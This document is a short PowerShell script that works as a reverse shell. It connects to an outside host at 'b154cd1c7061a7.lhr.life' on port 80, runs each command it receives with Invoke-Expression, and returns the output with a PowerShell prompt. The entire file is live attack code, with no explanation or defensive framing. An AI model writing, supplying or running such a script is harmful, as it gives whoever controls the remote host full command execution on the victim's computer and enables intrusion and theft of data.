$client = New-Object System.Net.Sockets.TcpClient("b154cd1c7061a7.lhr.life", 80);
if ($client.Connected -eq $false) {
    Write-Host "Connection failed."
    exit
}
$stream = $client.GetStream();
[byte[]]$bytes = 0..255|%{0};
while($true){
    $i = 0;
    while($i -lt 255){
        $i = $stream.Read($bytes, 0, $bytes.Length);
        if($i -gt 0){
            $data = (New-Object Text.ASCIIEncoding).GetString($bytes, 0, $i);
            $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String );
            $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
            $stream.Write($sendbyte, 0, $sendbyte.Length);
            $stream.Flush();
        }
    }
}
